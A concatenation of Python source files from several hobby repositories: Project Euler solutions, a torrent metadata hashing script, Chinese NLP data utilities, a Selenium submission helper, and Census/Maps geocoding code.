# 145 is a curious number, as 1! + 4! + 5! = 1 + 24 + 120 = 145. # # Find the sum of all numbers which are equal to the sum of the factorial of their digits. # # Note: As 1! = 1 and 2! = 2 are not sums they are not included. # https://projecteuler.net/problem=34 from math import factorial from time import process_time # [0, 1, 2, 6, 24, 120, 720, 5040, 40320, 362880] facs = [factorial(x) if x > 0 else 0 for x in range(0, 10)] facs_s = {str(x): factorial(x) if x > 0 else 1 for x in range(0, 10)} def facs_sum_s(num): return sum([facs_s[c] for c in list(str(num))]) def facs_sum(num): n = num s = 0 while n > 0: s += facs[n % 10] n = int(n / 10) return s def find_answers(): # '2540160' is the sum of factorial(9) for '9999999', at which point 9999999 exceeds the max # factorial sum for the digit length '7' and will continue to grow, so we can stop there, # as beyond that point, the sum of the factorials can never equal the number x = 3 while x < 2540160: print(f"\rTesting {x:07d}", flush=True, end='') if facs_sum_s(x) == x: print(f"\r \u2713 {x:07d}", flush=True) yield x x = x + 1 def problem34(): start = process_time() answers = [] for a in find_answers(): answers.append(a) print(f"\nProblem 34: {sum(answers)}, time: {process_time() - start}s answers: {answers}, facs: {facs}") # 40730 problem34()
cgnik/euler
src/py/problem30.py
# Surprisingly there are only three numbers that can be written as the sum of fourth powers of their digits: # # 1634 = 14 + 64 + 34 + 44 # 8208 = 84 + 24 + 04 + 84 # 9474 = 94 + 44 + 74 + 44 # As 1 = 14 is not a sum it is not included. # # The sum of these numbers is 1634 + 8208 + 9474 = 19316. # # Find the sum of all the numbers that can be written as the sum of fifth powers of their digits. from util.digit_exponents import power_sums def problem30(): limit = 10 ** 8 print(f"calculating power sums with upper limit of {limit:,}") sums = list(power_sums(5, limit)) print(f"Problem 30 found {len(sums)} sums of fifth powers {sums}") print(f"Problem 30: {sum(sums)}") problem30()
cgnik/euler
src/py/problem4.py
<reponame>cgnik/euler from palindrome import find_palindromes def first(x): return x[0] def problem4(): palindromes = find_palindromes() palindromes.sort(key=first, reverse=True) print(f"best: {palindromes[0]}") problem4()
cgnik/euler
src/py/problem18.py
<filename>src/py/problem18.py<gh_stars>0 from statistics import mean def weight_down(d, row, column): w = [d for i in range(0, len(d) - row) for d in d[i][column:column + i]] if len(w) == 0: return d[row][column] return int(mean([d[row][column], mean(w)])) def weight_data_down(d): weights = [] for xindex, x in enumerate(d): weights.append([(yindex, xindex, weight_down(d, xindex, yindex), y) for yindex, y in enumerate(x)]) for w in weights: w.sort(key=lambda x: x[2], reverse=True) return weights def next_choices(c, last_index): return c[0] == last_index or c[0] == last_index + 1 def pathize(tiers, override={}): weights = weight_data_down(tiers) indices = [weights[0][0]] for dindex in range(1, len(tiers)): if override.get(dindex): indices.append(weights[dindex][override[dindex]]) else: a, b = list(filter(lambda c: next_choices(c, indices[-1][0]), weights[dindex])) indices.append(a if a[2] > b[2] else b) return indices def from_index(grid, row_index, column_index): nexts = [] if row_index > len(grid): return nexts row = grid[row_index + 1] if column_index < len(row): nexts.append(row[column_index]) if column_index > 0: nexts.append(row[column_index - 1]) return nexts def weight_up(grid, row_index, column_index): weights = [grid[row_index][column_index]] next_weights = from_index(grid, row_index, column_index) if len(next_weights): weights.append(mean(next_weights)) return sum(weights) def next_index(grid, row_index, column_index): ln = len(grid[row_index]) if column_index == 0 or ln == 1: return 0 elif column_index >= ln: return ln - 1 elif weight_up(grid, row_index, column_index) < weight_up(grid, row_index, column_index - 1): return column_index - 1 return column_index def pathize_up(triangle): tiers = triangle.copy() tiers.reverse() max_path = [0] paths = [] for num_index, num in enumerate(tiers[0]): path = [(num_index, num)] for tier_index, tier in enumerate(tiers): if tier_index == 0: continue up_index = next_index(tiers, tier_index, path[-1][0]) path.append((up_index, tier[up_index])) # print(f"path: {path}") addends = [x[1] for x in path] if sum(addends) > sum(max_path): max_path = addends max_path.reverse() return max_path def problem18up(d): answer = pathize_up(d) print(f"Up-path answer: {sum(answer)} :: {answer}") def elaborate(d, row, column): if row < len(d) - 1: paths = elaborate(d, row + 1, column) + elaborate(d, row + 1, column + 1) for p in paths: p.insert(0, d[row][column]) return paths return [[d[row][column]]] def problem18brute(d): all = [(sum(e), e) for e in elaborate(d, 0, 0)] best = max(all, key=lambda x: x[0]) # answer: (1074, [75, 64, 82, 87, 82, 75, 73, 28, 83, 32, 91, 78, 58, 73, 93]) print(f"Brute answer: {best}") def problem18(): d = [list(map(lambda x: int(x), a.strip().split(' '))) for a in """75 95 64 17 47 82 18 35 87 10 20 04 82 47 65 19 01 23 75 03 34 88 02 77 73 07 63 67 99 65 04 28 06 16 70 92 41 41 26 56 83 40 80 70 33 41 48 72 33 47 32 37 16 94 29 53 71 44 65 25 43 91 52 97 51 14 70 11 33 28 77 73 17 78 39 68 17 57 91 71 52 38 17 14 91 43 58 50 27 29 48 63 66 04 68 89 53 67 30 73 16 69 87 40 31 04 62 98 27 23 09 70 98 73 93 38 53 60 04 23""".split("\n")] problem18brute(d) problem18up(d) problem18()
cgnik/euler
src/py/util/collatz.py
<filename>src/py/util/collatz.py def collatz(n): if n % 2 == 0: return int(n / 2) return (n * 3) + 1 def collatz_series(n): a = n while a != 1: a = collatz(a) yield a return 1
cgnik/euler
src/py/util/abundant.py
<reponame>cgnik/euler from util.cartesian import all_factors def abundant_numbers(up_to): abundants = [] for n in range(12, up_to + 1): if n % 100 == 0: print(f"\rcalculating abundants: {int(n * 100 / up_to)}%", end='', flush=True) if sum(all_factors(n)) > n: abundants.append(n) abundants = list(set(abundants)) abundants.sort() print("") return abundants def contains_sum_for(num, adders): adders = list(filter(lambda x: x < num, adders)) adders.sort() start = 0 end = len(adders) - 1 if num in list(map(lambda n: n * 2, adders)): return True while start < end: result = adders[start] + adders[end] if result == num: return True elif result > num: end -= 1 else: start += 1 return False # def contains_sum_for(num, adders): # available = [a for a in adders if a < num] # for index, a in enumerate(available): # if (num - a) in available: # return True # return False
cgnik/euler
src/py/problem31.py
<gh_stars>0 # In England the currency is made up of pound, ยฃ, and pence, p, and there are eight coins in general circulation: # # 1p, 2p, 5p, 10p, 20p, 50p, ยฃ1 (100p) and ยฃ2 (200p). # It is possible to make ยฃ2 in the following way: # # 1ร—ยฃ1 + 1ร—50p + 2ร—20p + 1ร—5p + 1ร—2p + 3ร—1p # How many different ways can ยฃ2 be made using any number of coins? # https://en.wikipedia.org/wiki/Partition_(number_theory) # these are the "partitions" of 200, and so predicted by a partition function # no closed form of the function is known def make_change(amount, coins): counts = [0] * (amount + 1) # have to initialize with 1 as 'seed' counts[0] = 1 # p(0) === 1 for coin in coins: for i in range(coin, len(counts)): counts[i] = counts[i] + counts[i - coin] print(f"DEBUG: coin/index/counts: {coin}/{counts}") return counts[-1] def change_largest_coin(coins): return make_change(max(coins), coins) def problem31_american(): print(f"Problem 31 American: {change_largest_coin([1, 5, 10, 25, 50, 100])}") def problem31_english(): print(f"Problem 31 English: {change_largest_coin([1, 2, 5, 10, 20, 50, 100, 200])}") def problem31(): print(f"Problem 31 test: 12: {make_change(12, [1, 2, 5])}") print(f"Problem 31 test: 10: {change_largest_coin([1, 5, 10])}") problem31_american() problem31_english() problem31()
cgnik/euler
src/py/util/primerator.py
from multiprocessing import Pool from util.factoring import is_prime_quick class Primerator: def __init__(self, limit): self.limit = limit def _candidate_generator_(self): for x in range(3, self.limit, 2): yield x def _one_thread_(self, candidate): if candidate % 100000 == 1: print('.', end='', flush=True) return candidate, is_prime_quick(candidate) def _filter_primes_(self, candidates): return filter(lambda x: x[1], candidates) def primes(self, thread_count=8): p = Pool(thread_count) results = p.map(self._one_thread_, self._candidate_generator_()) answers = [2] answers.extend(map(lambda y: y[0], self._filter_primes_(results))) return answers
cgnik/euler
src/py/util/repeats.py
<reponame>cgnik/euler<gh_stars>0 import re, decimal max_precision = 4096 def unit_fraction_cycle(n): decimal.setcontext(decimal.Context(prec=max_precision, rounding=decimal.ROUND_HALF_DOWN)) val = str(decimal.Decimal(1) / decimal.Decimal(n)) if val and '.' in val: s = val.split('.')[1][:-1] return repeats(s) return '' def repeats(big_s): def find_repeats(s): l_str = len(s) l_max = int(l_str / 2) combos = [] for start in range(0, l_max): combos.extend([s[start:end + start] for end in range(start, l_max + 1)]) combos = set(combos) matches = [(len(re.findall(c, s)), len(c), (len(s) - s.index(c)), c) for c in combos if tip_to_tail(s, c)] matches.sort(reverse=True) if len(matches) > 0 and matches[0][0] > 1: return matches[0][3] return '' if len(big_s) > 1 and len(re.findall(big_s[0], big_s)) == len(big_s): return big_s[0] l_full = len(big_s) l_part = 16 while l_part <= l_full: cycle = find_repeats(big_s[:l_part]) if cycle != '' or l_part >= l_full: return cycle l_part *= 2 l_part = min(l_part, l_full) return '' def tip_to_tail(s, sub): if len(sub) == 0 or len(s) == 0: return False others = [o for o in s.split(sub)[1:] if o != sub and len(o) > 0] if len(others) > 0 and sub.startswith(others[-1]): others = others[:-1] return not len(others) > 0
cgnik/euler
src/py/util/test_repeats.py
<filename>src/py/util/test_repeats.py<gh_stars>0 from unittest import TestCase from util.repeats import unit_fraction_cycle, repeats, tip_to_tail class Test_repeats(TestCase): def test_repeats(self): self.assertEqual('', repeats('f')) self.assertEqual('f', repeats('ff')) self.assertEqual('flibbidy', repeats('flibbidyflibbidy')) self.assertEqual('', repeats('jibbetflibbidyflib')) self.assertEqual('flibbidy', repeats('jibbetflibbidyflibbidyflib')) def test_unit_fraction_cycle(self): self.assertEqual('', unit_fraction_cycle(2)) self.assertEqual('3', unit_fraction_cycle(3)) self.assertEqual('', unit_fraction_cycle(4)) self.assertEqual('', unit_fraction_cycle(5)) self.assertEqual('6', unit_fraction_cycle(6)) self.assertEqual('142857', unit_fraction_cycle(7)) self.assertEqual('', unit_fraction_cycle(8)) self.assertEqual('1', unit_fraction_cycle(9)) self.assertEqual('', unit_fraction_cycle(10)) def test_tip_to_tail(self): self.assertTrue(tip_to_tail('abcabc', 'abc')) self.assertTrue(tip_to_tail('abcabca', 'abc')) self.assertTrue(tip_to_tail('dddabcabc', 'abc')) self.assertTrue(tip_to_tail('peqabcabca', 'abc')) self.assertFalse(tip_to_tail('peqabcabcp', 'abc'))
cgnik/euler
src/py/problem12.py
from util.numeric import triangles from util.cartesian import cartesian_factors from util.factoring import factors def triangulate(start=2 ** 30, limit=100): count = 0 for x in triangles(): count += 1 if x >= start: facs = list(factors(x, log=False)) facs.remove(x) if len(facs) > limit: return x, facs else: yield x, facs def verify(n, facs): for f in facs: if n % f != 0: raise ValueError(f"{n} is NOT evenly divisible by {f}") def problem12(): # N: 725145761340: cartlen: 490 # start_threshold = 925517539128 # is the best so far # start_threshold = 725145761340 # is the best so far start_threshold = 55 print(f"Starting factorization of triangles with {start_threshold}") best_len = 0 for answer in triangulate(start_threshold): cart = cartesian_factors(answer[0], answer[1]) print(f"N: {answer[0]} ({len(cart[1])})") if len(cart[1]) > 500: break verify(answer[0], cart[1]) print(f"Answer: {answer[0]}\nFactor Count: {len(cart[1])}\n\tFactors: {cart}") problem12() # answer appears to be : 76576500
cgnik/euler
src/py/util/numeric.py
<reponame>cgnik/euler def ticklog(count, increment): if count % increment == 0: print(".", end='', flush=True) def naturals(seed=1): num = seed while True: yield num num += 1 def triangles(): last = 0 for n in naturals(): last = n + last yield last
cgnik/euler
src/py/problem15.py
<filename>src/py/problem15.py from scipy.linalg import pascal def problem15(): print(f"binom: {pascal(21)[-1][-1]}") problem15()
sTeeLM/tc
tc.py
#!/usr/bin/env python # -*- coding: UTF-8 -*- import torrent_parser as tp import sys import md5 import re def md5_string(val): m = md5.new() matchObj = re.match(r'^(.*)\.(.*?)$', val) if matchObj: val = matchObj.group(1) m.update(val) return m.hexdigest() + '.' + matchObj.group(2) else: m.update(val) return m.hexdigest() data = tp.parse_torrent_file(sys.argv[1]) data['info']['name'] = md5_string(data['info']['name'].encode('utf-8')) data['info']['publisher'] = md5_string(data['info']['publisher'].encode('utf-8')) if 'name.utf-8' in data['info']: data['info']['name.utf-8'] = md5_string(data['info']['name.utf-8'].encode('utf-8')) if 'publisher.utf-8' in data['info']: data['info']['publisher.utf-8'] = md5_string(data['info']['publisher.utf-8'].encode('utf-8')) for i in range(0, len(data['info']['files'])): data['info']['files'][i]['path'][0] = md5_string(data['info']['files'][i]['path'][0].encode('utf-8')) if 'path.utf-8' in data['info']['files'][i]: data['info']['files'][i]['path.utf-8'][0] = md5_string(data['info']['files'][i]['path.utf-8'][0].encode('utf-8')) tp.create_torrent_file(sys.argv[2], data)
zingp/nlpclub
data/utils.py
import time import json import datetime import xlrd import xlsxwriter """ ๆœฌๆจกๅ—ๅฎšไน‰้€š็”จๆ•ฐๆฎๅค„็†็›ธๅ…ณ็š„ๅŠŸ่ƒฝๅ‡ฝๆ•ฐ """ def read_text(file_path): """ ่ฏปๆ–‡ๆœฌๆ–‡ไปถ่ฟ”ๅ›žๅ†…ๅฎนๅˆ—่กจ๏ผŒๅˆ—่กจๅ…ƒ็ด ๆ˜ฏๅŽŸๆ–‡็š„ไธ€่กŒ Args: file_path (str) ๅŽŸๆ–‡ๆœฌๆ–‡ไปถ Returns: data (list) ๅˆ—่กจๅ…ƒ็ด ๆ˜ฏๆ–‡ๆœฌ่กŒ """ with open(file_path, "r") as f: data = f.read().splitlines() return data def write_text(str_list, out_file): """ๅญ—็ฌฆไธฒๅˆ—่กจๆŒ‰่กŒๅ†™ๅ…ฅๆ–‡ไปถ Args: str_list (list(str)) ๅพ…ๅ†™ๆ–‡ๆœฌๅ†…ๅฎน out_file (str) ่พ“ๅ‡บๆ–‡ไปถ """ with open(out_file, "w") as f: for line in str_list: f.write(line + "\n") def read_excel(file_path, sheet="Sheet1"): """่ฏปๅ–excel Args: file_path (str) ๅพ…่ฏปๆ–‡ไปถ๏ผŒ้€šๅธธ.xlsx็ป“ๅฐพ sheet (str) excel sheet, ้ป˜่ฎคSheet1 Returns: data_li (list๏ผˆtuple๏ผ‰) Excel ๆฏ่กŒๅ†…ๅฎน sheet.row_values(0) list ๅˆ—ๅ """ data_li= [] workbook = xlrd.open_workbook(file_path) sheet = workbook.sheet_by_name(sheet) for i in range(1, sheet.nrows): row = sheet.row_values(i) data_li.append(row) return data_li, sheet.row_values(0) def write_excel(data_list, file_path, column_names): workbook = xlsxwriter.Workbook(file_path) sheet1 = workbook.add_worksheet() #column_names = ["ไธญๅฟƒ่ฏ", "่Š‚็›ฎid", "่Š‚็›ฎๅ็งฐ","่Š‚็›ฎๆ‘˜่ฆ"] for i in range(len(column_names)): sheet1.write(0, i, column_names[i]) # ๅฐ†ๆ•ฐๆฎๅ†™ๅ…ฅ for i, row_li in enumerate(data_list): sheet1_row = i+1 for j in range(len(row_li)): sheet1.write(sheet1_row, j, row_li[j]) workbook.close() def time2stamp(time_str): """ๅญ—็ฌฆไธฒ่ฝฌๆ—ถ้—ดๆˆณ""" d = datetime.datetime.strptime(time_str, "%Y-%m-%d %H:%M:%S") t = d.timetuple() return int(time.mktime(t)) def reverse_json(str_list): """ ๅๅบๅˆ—ๅŒ– Args๏ผš str_list list(str) Returns: data list(obj) error list(tuple) """ data = [] error = [] for line in str_list: try: dic = json.loads(line) data.append(dic) except Exception as e: error.append([line, str(e)]) return data, error def obj_to_json(data): """ๅบๅˆ—ๅŒ– """ dataset = [] for dic in data: line = json.dumps(dic, ensure_ascii=False) dataset.append(line) return dataset
zingp/nlpclub
data/eda.py
<reponame>zingp/nlpclub import jieba import synonyms import random from random import shuffle from pprint import pprint """ EDAๆ•ฐๆฎๅขžๅผบ ็Žฐๅœจๅญ˜ๅœจ้—ฎ้ข˜๏ผš้šๆœบไบคๆขๅฏ่ƒฝๅ‡บ็Žฐๆ ‡็‚น็ฌฆๅท็›ธไบ’ไบคๆข """ random.seed(42) # ๅŒไน‰่ฏๆ›ฟๆข def synonym_replacement(words, n, stopwords): """ๆ›ฟๆขไธ€ไธช่ฏญๅฅไธญ็š„nไธชๅ•่ฏไธบๅ…ถๅŒไน‰่ฏ""" new_words = words.copy() random_word_list = list(set([w for w in words if w not in stopwords])) random.shuffle(random_word_list) num_replaced = 0 for word in random_word_list: synonym_words = get_synonyms(word) if len(synonym_words) >= 1: synonym = random.choice(synonym_words) new_words = [synonym if w == word else w for w in new_words] num_replaced += 1 if num_replaced >= n: break sentence = ' '.join(new_words) new_words = sentence.split(' ') return new_words def get_synonyms(word): return synonyms.nearby(word)[0] # ้šๆœบๆ’ๅ…ฅ def random_insertion(words, n): """้šๆœบๅœจ่ฏญๅฅไธญๆ’ๅ…ฅnไธช่ฏ""" new_words = words.copy() for _ in range(n): add_word(new_words) return new_words def add_word(new_words): """ไปŽๆบๅฅๅญไธญ้šๆœบๆ‰พๅ‡บๅไธช่ฏ็š„ๅŒไน‰่ฏ๏ผŒ้šๆœบ้€‰ๆ‹ฉไธ€ไธช้šๆœบๆ’ๅ…ฅๅˆฐๅฅๅญไธญ """ synonyms = [] counter = 0 while len(synonyms) < 1: random_word = new_words[random.randint(0, len(new_words)-1)] synonyms = get_synonyms(random_word) counter += 1 if counter >= 10: return random_synonym = random.choice(synonyms) random_idx = random.randint(0, len(new_words)-1) new_words.insert(random_idx, random_synonym) # ้šๆœบไบคๆข๏ผšRandomly swap two words in the sentence n times def random_swap(words, n): new_words = words.copy() for _ in range(n): new_words = swap_word(new_words) return new_words def swap_word(new_words): idx1 = random.randint(0, len(new_words)-1) idx2 = idx1 counter = 0 while idx2 == idx1: idx2 = random.randint(0, len(new_words)-1) counter += 1 if counter > 3: return new_words new_words[idx1], new_words[idx2] = new_words[idx2], new_words[idx1] return new_words # ้šๆœบๅˆ ้™ค๏ผšไปฅๆฆ‚็އpๅˆ ้™ค่ฏญๅฅไธญ็š„่ฏ def random_deletion(words, p): if len(words) == 1: return words new_words = [] for word in words: r = random.uniform(0, 1) if r > p: new_words.append(word) if len(new_words) == 0: rand_int = random.randint(0, len(words)-1) return [words[rand_int]] return new_words # EDAๅ‡ฝๆ•ฐ def eda(sentence, stopwords, alpha_sr=0.1, alpha_ri=0.1, alpha_rs=0.1, p_rd=0.1, num_aug=9, cha=""): seg_list = jieba.cut(sentence) seg_list = " ".join(seg_list) words = list(seg_list.split()) num_words = len(words) augmented_sentences = [] num_new_per_technique = int(num_aug/4) + 1 n_sr = max(1, int(alpha_sr * num_words)) n_ri = max(1, int(alpha_ri * num_words)) n_rs = max(1, int(alpha_rs * num_words)) # ๅŒไน‰่ฏๆ›ฟๆขsr for _ in range(num_new_per_technique): a_words = synonym_replacement(words, n_sr, stopwords) augmented_sentences.append(cha.join(a_words)) # ้šๆœบๆ’ๅ…ฅri for _ in range(num_new_per_technique): a_words = random_insertion(words, n_ri) augmented_sentences.append(cha.join(a_words)) # ้šๆœบไบคๆขrs for _ in range(num_new_per_technique): a_words = random_swap(words, n_rs) augmented_sentences.append(cha.join(a_words)) # ้šๆœบๅˆ ้™คrd for _ in range(num_new_per_technique): a_words = random_deletion(words, p_rd) augmented_sentences.append(cha.join(a_words)) # print(augmented_sentences) shuffle(augmented_sentences) if num_aug >= 1: augmented_sentences = augmented_sentences[:num_aug] else: keep_prob = num_aug / len(augmented_sentences) augmented_sentences = [s for s in augmented_sentences if random.uniform(0, 1) < keep_prob] # augmented_sentences.append(seg_list) augmented_sentences.append(sentence) return augmented_sentences def eda_augment(textlist, stopwords, n): """ edaๆ–‡ๆœฌๅขžๅผบ textlist: ๆ–‡ๆœฌๅˆ—่กจ n: ็”Ÿๆˆๅขžๅผบๆ–‡ๆœฌๆ•ฐ้‡ return: ๅˆ—่กจ๏ผŒๅขžๅผบ็š„ๆ–‡ๆœฌ """ augment_list = [] for snetence in textlist: eda_list = eda(snetence, stopwords, num_aug=n) augment_list.extend(eda_list) return augment_list if __name__ == "__main__": from utils import load_data stopwords = load_data("../../data/stopwords.txt") sentence = ["ๆ˜Ž็กฎๅ…šๅœจๆ–ฐๆ—ถไปฃ็š„ๅผบๅ†›็›ฎๆ ‡ๆ˜ฏๅปบ่ฎพไธ€ๆ”ฏๅฌๅ…šๆŒ‡ๆŒฅใ€่ƒฝๆ‰“่ƒœไป—ใ€ไฝœ้ฃŽไผ˜่‰ฏ็š„ๅ†›้˜Ÿใ€‚"] ans = eda_augment(sentence, stopwords, 20) pprint(ans)
zingp/nlpclub
data/main.py
from utils import read_excel, write_text from utils import obj_to_json # ไฟๅญ˜ๅŽŸๆ–‡ # ไฟๅญ˜ๆ–‡ๆœฌ่ฟ่ง„json # ้Ÿณ้ข‘่ฟ่ง„json # ๆ•ฐๆฎๅŠ ่ฝฝ def build_audio_dic(text_list): if len(text_list) != 5: return {} dic = { "idx": text_list[0], "date": text_list[1], "cate1": text_list[2], "cate2": text_list[3], "reason": text_list[4] } return dic def pretreat_excel(): excel = "~/Desktop/ๅฝ•ๆ’ญๆ ‡ๆณจๆ•ฐๆฎ/2020ๅนดunsafe่Š‚็›ฎๅคๆ ธๆ”น-319.xlsx" data, cols = read_excel(excel) print(cols) print(data[:2]) text_risk_list = [] voice_risk_list = [] for li in data: isText = li[3] dic = build_audio_dic(li) if isText.strip() == "ๆ–‡ๆœฌ่ฟ่ง„": text_risk_list.append(dic) else: voice_risk_list.append(dic) text_risk_data = obj_to_json(text_risk_list) voice_risk_data = obj_to_json(voice_risk_list) write_text(text_risk_data, "text_risk_data.json") write_text(voice_risk_data, "voice_risk_data.json") print("Done!") if __name__ == "__main__": pretreat_excel()
zingp/nlpclub
data/about_excel.py
from utils import * if __name__ == '__main__': txt = "/Users/liuyouyuan/Desktop/unsafe_text_main.txt" data = read_text(txt) new_data = [line.split("\t") for line in data] col = ["Live id", "Text", "่ฟ่ง„็ฑปๅž‹"] write_excel(new_data, "/Users/liuyouyuan/Desktop/็›ดๆ’ญ30sไธๅฎ‰ๅ…จๆ ‡ๆณจ20210419.xlsx", col)
zingp/nlpclub
emoji_data/proprecessing_emoji.py
<filename>emoji_data/proprecessing_emoji.py import os import re import emoji import numpy as np def clean_text_zh(text): """ไธญๆ–‡ๆ•ฐๆฎๆธ…ๆด—""" # ๅŽป้™ค็ฉบๆ ผ text = re.sub(' ', '', text) # ๅŽปๆމๅ…จ่ง’็ฉบ็™ฝ็ฌฆ๏ผŒ\u3000 ๆ˜ฏๅ…จ่ง’็š„็ฉบ็™ฝ็ฌฆ text = re.sub('\u3000', '', text) # ๅŽปๆމ \xa0 ๆ˜ฏไธ้—ดๆ–ญ็ฉบ็™ฝ็ฌฆ &nbsp; text = re.sub('\xa0', '', text) return text def filter_emoji(text, restr=''): """่ฟ‡ๆปคemoji""" # ็ผ–่ฏ‘ๅŒน้…่กจๆƒ…็š„ๆญฃๅˆ™ prog = emoji.get_emoji_regexp() return prog.sub(restr, text) def load_emoji(emoji_file): """ๅŠ ่ฝฝ่กจๆƒ…ๅ’Œๅฏนๅบ”็š„ไธญๆ–‡""" dic = {} with open(emoji_file, "r") as f: for line in f: if len(line.strip("\n").strip()) == 0: continue line = line.strip("\n") line_li = line.split() key = line_li[0] value = line_li[-1] dic[key] = value return dic def emoji2zh(text, emoji_dic): """่กจๆƒ…ๆ›ฟๆขไธบไธญๆ–‡""" prog = emoji.get_emoji_regexp() li = re.findall(prog, text) for emo in li: text = text.replace(text, emoji_dic.get(emo, "่กจๆƒ…")) return text
ShuteLee/submit_to_site
main.py
# encoding=utf8 from selenium import webdriver from selenium.webdriver.common.desired_capabilities import DesiredCapabilities import time import os ''' Update your chrome Download the latest chromedriver Put all the papers in one directory and update to "paper_dir" If your chrome says "THE SITE CAN'T BE REACHED", please feel free to close it and try again, again... ''' def openChrome(): option = webdriver.ChromeOptions() option.add_argument('disable-infobars') # set your chromedriver path driver = webdriver.Chrome(executable_path='XXX\\chromedriver.exe', chrome_options=option) return driver def login(driver): elem = driver.find_element_by_name("XXX") # Conference ID elem.send_keys("XXX") elem = driver.find_element_by_name("XXX") elem.click() def submit_one(driver, paper_id): driver.find_element_by_xpath("//input [@type=\"submit\"]").click() print('{} submitted successfully'.format(paper_id)) # url = "XXX" url = 'XXX' paper_dir = 'XXX' if __name__ == '__main__': paper_name_list = os.listdir(paper_dir) driver = openChrome() driver.get(url) login(driver) for name in paper_name_list: print('id:{}'.format(name[:-4])) submit_one(driver, name[:-4])
B-Rad80/code-components
hubQuery/FileDumpParser.py
#FileDumpParser import csv import os, zipfile, sys import codecs og = os.getcwd() def unzip(file): cwd = os.path.join(og, "ZipFIles") print(cwd) os.chdir(cwd) # change directory from working dir to dir with files if(zipfile.is_zipfile(file)): with zipfile.ZipFile(file,"r") as zip_ref: zip_ref.extractall(cwd) zip_ref.close() # close file os.remove(file) # delete zipped file else: print(file, "is not an existing Zipfile!") def parseCSV(file): #file = "CVSFiles/"+ file cwd = os.path.join(og, "CSVFiles") print(cwd) os.chdir(cwd) addy_List = [] noAddyList = [] with open(file, 'rb') as csv_file: #csv_reader = csv.reader(csv_file, delimiter=',',) csv_reader = csv.reader(x.replace('\0', '') for x in csv_file) line_count = 0 for row in csv_reader: if(row == []): print(addy_List) print("\n\nNO ADDR LIST \n\n\n\n") print(noAddyList) return 1 #print(line_count) if line_count == 0: print('Column names are {", ".join(row)}') elif row[3] != "Rejected": if(row[4] != ""): tl = [row[0], row[4]] addy_List.append(tl) else: tl = [row[0]] noAddyList.append(tl) line_count += 1 parseCSV("candidates.csv") unzip("Test1.zip")
B-Rad80/code-components
getInHub.py
import requests import simplejson as json import designation key = "<KEY>" def getCoord(addr): #takes plaintext address and returns coordinates payload = {'address':addr, 'key':key} #puts paramaters for url in dictionary, to be passed in next line mapsResponse = requests.get('https://maps.googleapis.com/maps/api/geocode/json', params=payload) #makes request using url mapsJson = json.loads(mapsResponse.text) #parses json-formatted response from plaintext into dictionary if int(mapsResponse.status_code) >= 400: return {'error':True, 'errorFatal':True, 'errorText':'HTTP Error: ' + censusResponse.status_code} if mapsJson['status'] != 'OK': return {'error':True, 'errorFatal':True, 'errorText':mapsJson['status']} country = "" for item in mapsJson['results'][0]['address_components']: if 'country' in item['types']: country = item['short_name'] #print(mapsResponse.text) if country == "US": locInfo = { 'error':False, 'errorText':"", 'lat':mapsJson['results'][0]['geometry']['location']['lat'], 'lng':mapsJson['results'][0]['geometry']['location']['lng'], 'faddr':mapsJson['results'][0]['formatted_address'], 'country':country} else: locInfo = { 'error':True, 'errorFatal':False, 'errorText':"Not a US Address", 'lat':mapsJson['results'][0]['geometry']['location']['lat'], 'lng':mapsJson['results'][0]['geometry']['location']['lng'], 'faddr':mapsJson['results'][0]['formatted_address'], 'country':country} return locInfo #returns a dictionary with two lat and lng and faddr def getCT(lat,lng): #takes latitude and longitude and returns census tract number payload = {'x':lng, 'y':lat, 'benchmark':"Public_AR_Census2010", 'vintage':'Census2010_Census2010', 'layers':'14', 'format':'json'} #puts paramaters for url in dictionary, to be passed in next line censusResponse = requests.get('https://geocoding.geo.census.gov/geocoder/geographies/coordinates', params=payload) #makes request using url if int(censusResponse.status_code) >= 400: return {'error':True, 'errorText':'HTTP Error: ' + censusResponse.status_code} censusJson = json.loads(censusResponse.text) #parses json-formatted response from plaintext into dictionary #11-digit census tract numbers are formatted 'XXYYYZZZZZZ' XX are state code, #YYY are county code and ZZZZZZ are tract code state = str(censusJson['result']['geographies']['Census Blocks'][0]['STATE']) #Pulls each code from json dictionary county = str(censusJson['result']['geographies']['Census Blocks'][0]['COUNTY']) tract = str(censusJson['result']['geographies']['Census Blocks'][0]['TRACT']) tractFull = state + county + tract #conbines codes into an 11-digit code countyFull = state + county #combines codes into a 5-digit county code return {'error':False, 'errorText':"", 'tract':tractFull, 'county':countyFull} #returns dictionary containing tract and county codes class location(): locSet = False #bool for wether the location has been set addressString = "" #inputted the string for the address. May be left blank if location is set from coordinates faddress = "" #formatted address from maps api call lat = "0" #string representations of coordinates lng = "0" tractCode = "0" #tract and county codes countyCode = "0" designated = False applicantName = "" # The name of the person associated with the address designationInfo = { 'county':{ 'name':"", 'prevYearDes':False, 'currYearDes':False, 'prevYearReason':"", 'currYearReason':""}, 'tract':{ 'prevYearDes':False, 'currYearDes':False} } error = False errorText = "" def __init__(self,addr): #constructor. Takes addr string as input. If addr == "", constructor will not set location, but will construct class if type(addr) != str: #if addr is not a string, throws error raise ValueError('addr must be type str') if addr != "": #only sets location if addr isn't blank locInfo = getCoord(addr) #Gets coordinates from google maps api, using plaintext address as input if locInfo['error']: self.error = True self.errorText = "Maps API ERROR: ' " + locInfo['errorText'] + " '" if not locInfo['errorFatal']: self.faddress = locInfo['faddr'] else: self.lat = str(locInfo['lat']) #sets lat, lng, and faddress values and sets locSet to true self.lng = str(locInfo['lng']) self.faddress = locInfo['faddr'] self.locSet = True if not self.error: codes = getCT(self.lat,self.lng) #pulls tract and county codes from census api if codes['error']: self.error = True self.errorText = "Census API Error: ' " + codes['errorText'] +" '" else: self.tractCode = codes['tract'] self.countyCode = codes['county'] if not self.error: self.designationInfo = designation.getDesignation(self.countyCode,self.tractCode) #pulls designation from database self.designated = self.designationInfo['county']['currYearDes'] or self.designationInfo['tract']['currYearDes'] #sets overall designation to true or false def setName(self, name): if type(name) != str: raise ValueError('name must be type str') self.applicantName = name
B-Rad80/code-components
FileDumpParser.py
